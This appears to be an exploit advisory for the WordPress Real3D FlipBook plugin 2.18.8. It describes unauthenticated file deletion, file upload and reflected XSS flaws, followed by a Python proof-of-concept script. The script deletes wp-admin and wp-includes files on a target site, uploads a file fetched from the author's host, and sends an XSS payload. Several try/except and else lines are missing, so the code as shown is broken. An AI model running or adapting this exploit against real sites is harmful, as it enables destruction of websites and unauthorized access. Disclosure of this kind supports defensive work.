WordPress CodeCanyon Real3D FlipBook 2.18.8 File Deletion / Upload / XSS

For Educational/Testing Purposes Only.

WordPress CodeCanyon Real3D FlipBook plugin version 2.18.8 suffers from unauthenticated file deletion, file upload, and cross site scripting vulnerabilities.

1) Unauthenticated file/directory deletion

Vulnerability exists in a file 'includes/process.php' where the user input eventually goes to PHP unlink() or rmdir() functions. We can give any file path or directory here. We can even delete the whole wordpress site. In my POC exploit, I'm just deleting the contents of wp-admin/ and wp-includes/ directories, which breaks the website anyways. The payload is really simple i.e.  deleteBook=../../../wp-includes/customize .The only trick is to delete the deepest directory first with no other directories in it and then move gradually to the parent directory.

2) Unauthenticated image upload (In case of old versions of php shell upload)

This vuln also exists in 'includes/process.php' where the user input lands in PHP function file_put_contents(). An end user can control the path parameter, the data parameter and the part of name parameter. The file name gets concatenated to '.jpg', something like $_POST['pageName'].'.jpg'. An end user can upload the image anywhere even in the root directory. If the webserver is running the old version of PHP prior to 5.3 which was vulnerable to null byte injection/truncation attacks, we can also upload PHP files by injecting null bytes, something like , 'image.php.jpg', which will result in 'image.php'.

3) Last one is A reflected XSS in 'includes/flipbooks.php'. 

User input ($_GET parameters) is directly echoed on the page.  You can find more in depth details and code analysis in my blog post here.  https://mukarramkhalid.com/wordpress-real-3d-flipbook-plugin-exploit/ 

# [+] [POC][Exploit] CodeCanyon Real3D FlipBook WordPress Plugin
# [+] http://codecanyon.net/item/real3d-flipbook-wordpress-plugin/6942587
# [+] Multiple Vulnerabilities Found by: Mukarram Khalid
# [+] https://mukarramkhalid.com/wordpress-real-3d-flipbook-plugin-exploit/
# [+] Requirements : Python 3.4.x or higher, Requests Module
# [+] Timeline: Vuln Found : 01-07-2016, Reported to Vendor: 03-07-2016

import os, json, base64
    import requests
    exit('[-] Importing Requests module failed')

class wpFlipbook:
    ''' Wordpress 3d flipbook plugin exploit '''

    headers  = {'User-agent' : 'Mozilla/11.0'}
    payload1 = {'deleteBook' : ''}
    payload2 = {'imgbase' : '', 'bookName' : '../../../', 'pageName' : 'makman'}
    payload3 = {'action' : 'delete', 'bookId' : '<script>alert(/makman/)</script>'}
    imageUrl = 'http://makman.tk/makman.jpg'
    wpFilesUrl = 'http://makman.tk/wpFiles.json'

    def __init__(self, url):
        url = url.rstrip('/')
        if 'http://' in url or 'https://' in url:
            self.url = url
            self.url = 'http://' + url

    def http(self, url, data = {}, post = False):
            if post:
                r = requests.post(url, data = data, headers = self.headers, timeout = 20)
                r = requests.get(url, params = data, headers = self.headers, timeout = 20)
            exit('[-] Something went wrong. Please check your internet connection')
        return r

    def deleteFiles(self):
        print('[+] Loading Wordpress file structure')
        r = self.http(self.wpFilesUrl)
        wpFiles = json.loads(r.text)
        print('[+] Wordpress File structure loaded successfully')
        print('[+] Creating directory real3dflipbook')
        r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', {'imgbase' : 'makman'}, True)
        print('[+] Deleting Files from wp-includes/ & wp-admin/')
        for wpFile in wpFiles['wpFiles']:
            print('    [+] Deleting File ' + wpFile)
            self.payload1['deleteBook'] = wpFile
            r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload1, True)
        print('[+] Files have been deleted successfully')

    def uploadImage(self):
        print('[+] Loading image file')
        r = self.http('http://makman.tk/makman.jpg')
        encodedImage = base64.b64encode(r.content)
        self.payload2['imgbase'] = ';,' + encodedImage.decode('utf-8')
        print('[+] Uploading image file in target root directory')
        r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload2, True)
        print('[+] Image has been uploaded here ' + self.url + '/' + self.payload2['pageName'] + '.jpg')

    def xss(self):
        print('[+] Checking XSS payload')
        r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php', self.payload3)
        if self.payload3['bookId'] in r.text:
            print('[+] Found XSS here :')
            print('    [+] ' + self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php?action=' + self.payload3['action'] + '&bookId=' + self.payload3['bookId'])


def banner():
    os.system('cls' if os.name == 'nt' else 'clear')
    tabs = '    '
    print(tabs + '*******************************************************************')
    print(tabs + '* [+] [POC][Exploit] CodeCanyon Real3D FlipBook WordPress Plugin  *')
    print(tabs + '* [+] Multiple Vulnerabilities Found by:                          *')
    print(tabs + '* [+] https://mukarramkhalid.com                                  *')
    print(tabs + '*******************************************************************\n\n')

def main():
    url = input('[+] Enter Url\n[+] E.g. http://test.com or http://test.com/wordpress\n[+] ')
    exploit = wpFlipbook(url)
    print('[+] Done')

if __name__ == '__main__':
    except KeyboardInterrupt:
        exit('\n[-] CTRL-C detected.\n')
# End


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